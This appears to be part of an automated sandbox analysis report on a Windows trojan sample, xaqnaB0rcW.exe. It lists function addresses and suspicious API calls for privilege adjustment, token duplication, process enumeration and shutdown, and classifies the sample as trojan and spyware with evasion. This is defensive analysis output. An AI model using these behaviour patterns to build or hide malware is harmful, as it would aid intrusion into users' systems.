                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00396606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00396606
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0038ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0038ACC5
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003979D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003979D3
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0037B0430_2_0037B043
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0038410F0_2_0038410F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003702A40_2_003702A4
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0038038E0_2_0038038E
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0035E3E30_2_0035E3E3
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0038467F0_2_0038467F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003706D90_2_003706D9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003BAACE0_2_003BAACE
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00384BEF0_2_00384BEF
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0037CCC10_2_0037CCC1
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00356F070_2_00356F07
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0035AF500_2_0035AF50
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0036B11F0_2_0036B11F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003B31BC0_2_003B31BC
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0037D1B90_2_0037D1B9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0037123A0_2_0037123A
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003632000_2_00363200
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0038724D0_2_0038724D
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003593F00_2_003593F0
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003913CA0_2_003913CA
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0036F5630_2_0036F563
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003596C00_2_003596C0
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039B6CC0_2_0039B6CC
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003577B00_2_003577B0
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003879C90_2_003879C9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0036FA570_2_0036FA57
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00363B700_2_00363B70
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00359B600_2_00359B60
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00357D190_2_00357D19
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0036FE6F0_2_0036FE6F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00379ED00_2_00379ED0
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00357FA30_2_00357FA3
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00FDA1280_2_00FDA128
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004185832_2_00418583
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030302_2_00403030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010DC2_2_004010DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E17C2_2_0040E17C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1272_2_0040E127
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1332_2_0040E133
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011C02_2_004011C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EBA32_2_0042EBA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024802_2_00402480
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FDCB2_2_0040FDCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FDD32_2_0040FDD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027602_2_00402760
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041677E2_2_0041677E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DFE32_2_0040DFE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FFF32_2_0040FFF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167832_2_00416783
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA3522_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E62_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F02_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E02742_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C02_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C81582_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA1182_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037301002_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F41A22_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D20002_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037407702_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037647502_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C02_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E02_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038005912_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037405352_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E44202_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E2F302_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DCD1F2_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037856302_2_03785630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038095C32_2_038095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DD5B02_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037314602_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF43F2_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFB762_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B5BF02_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377DBF92_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FB802_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B3A6C2_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFA492_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7A462_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EDAC62_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DDAAC2_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03785AA02_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E1AA32_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037499502_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B9502_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D59102_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AD8002_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037438E02_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFF092_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD22_2_03703FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD52_2_03703FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFFB12_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03741F922_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03749EB02_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7D732_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F1D5A2_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03743D402_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FDC02_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B9C322_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFCF22_2_037FFCF2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EB02C05_2_02EB02C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02ED02745_2_02ED0274
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EF03E65_2_02EF03E6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E3E3F05_2_02E3E3F0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEA3525_2_02EEA352
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EC20005_2_02EC2000
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EE81CC5_2_02EE81CC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EF01AA5_2_02EF01AA
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EE41A25_2_02EE41A2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EB81585_2_02EB8158
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E201005_2_02E20100
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02ECA1185_2_02ECA118
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E4C6E05_2_02E4C6E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E2C7C05_2_02E2C7C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E307705_2_02E30770
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E547505_2_02E54750
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EDE4F65_2_02EDE4F6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EE24465_2_02EE2446
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02ED44205_2_02ED4420
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EF05915_2_02EF0591
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E305355_2_02E30535
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E2EA805_2_02E2EA80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EE6BD75_2_02EE6BD7
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEAB405_2_02EEAB40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E5E8F05_2_02E5E8F0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E168B85_2_02E168B8
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E3A8405_2_02E3A840
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E328405_2_02E32840
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E329A05_2_02E329A0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EFA9A65_2_02EFA9A6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E469625_2_02E46962
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEEEDB5_2_02EEEEDB
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E42E905_2_02E42E90
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EECE935_2_02EECE93
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E30E595_2_02E30E59
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEEE265_2_02EEEE26
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E3CFE05_2_02E3CFE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E22FC85_2_02E22FC8
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EAEFA05_2_02EAEFA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EA4F405_2_02EA4F40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E72F285_2_02E72F28
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E50F305_2_02E50F30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02ED2F305_2_02ED2F30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E20CF25_2_02E20CF2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02ED0CB55_2_02ED0CB5
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E30C005_2_02E30C00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E2ADE05_2_02E2ADE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E48DBF5_2_02E48DBF
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E3AD005_2_02E3AD00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02ECCD1F5_2_02ECCD1F
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02ED12ED5_2_02ED12ED
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E4B2C05_2_02E4B2C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E352A05_2_02E352A0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E7739A5_2_02E7739A
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E1D34C5_2_02E1D34C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EE132D5_2_02EE132D
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EE70E95_2_02EE70E9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEF0E05_2_02EEF0E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EDF0CC5_2_02EDF0CC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E370C05_2_02E370C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E3B1B05_2_02E3B1B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EFB16B5_2_02EFB16B
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E6516C5_2_02E6516C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E1F1725_2_02E1F172
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EE16CC5_2_02EE16CC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E756305_2_02E75630
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEF7B05_2_02EEF7B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E214605_2_02E21460
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEF43F5_2_02EEF43F
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02ECD5B05_2_02ECD5B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EE75715_2_02EE7571
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EDDAC65_2_02EDDAC6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02ECDAAC5_2_02ECDAAC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E75AA05_2_02E75AA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02ED1AA35_2_02ED1AA3
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EA3A6C5_2_02EA3A6C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEFA495_2_02EEFA49
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EE7A465_2_02EE7A46
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EA5BF05_2_02EA5BF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E6DBF95_2_02E6DBF9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E4FB805_2_02E4FB80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEFB765_2_02EEFB76
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E338E05_2_02E338E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E9D8005_2_02E9D800
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E399505_2_02E39950
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E4B9505_2_02E4B950
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EC59105_2_02EC5910
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E39EB05_2_02E39EB0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEFFB15_2_02EEFFB1
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E31F925_2_02E31F92
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEFF095_2_02EEFF09
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEFCF25_2_02EEFCF2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EA9C325_2_02EA9C32
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E4FDC05_2_02E4FDC0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EE7D735_2_02EE7D73
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E33D405_2_02E33D40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EE1D5A5_2_02EE1D5A
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00411C305_2_00411C30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040CB185_2_0040CB18
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040CB205_2_0040CB20
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040CD405_2_0040CD40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040AD305_2_0040AD30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040AE745_2_0040AE74
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040AEC95_2_0040AEC9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040AE805_2_0040AE80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_004152D05_2_004152D0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_004134CB5_2_004134CB
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_004134D05_2_004134D0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0042B8F05_2_0042B8F0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AEE2175_2_00AEE217
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AEE3385_2_00AEE338
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AED7985_2_00AED798
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AECA245_2_00AECA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: String function: 02E77E54 appears 111 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: String function: 02EAF290 appears 105 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: String function: 02E65130 appears 58 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: String function: 02E1B970 appears 277 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: String function: 02E9EA12 appears 86 times
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: String function: 00376AC0 appears 42 times
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: String function: 0037F8A0 appears 35 times
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: String function: 0036EC2F appears 68 times
                Source: xaqnaB0rcW.exe, 00000000.00000003.1348367351.0000000003883000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs xaqnaB0rcW.exe
                Source: xaqnaB0rcW.exe, 00000000.00000003.1348761048.0000000003A2D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs xaqnaB0rcW.exe
                Source: xaqnaB0rcW.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@8/6
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039CE7A GetLastError,FormatMessageW,0_2_0039CE7A
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0038AB84 AdjustTokenPrivileges,CloseHandle,0_2_0038AB84
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0038B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0038B134
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0039E1FD
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00396532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00396532
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003AC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_003AC18C
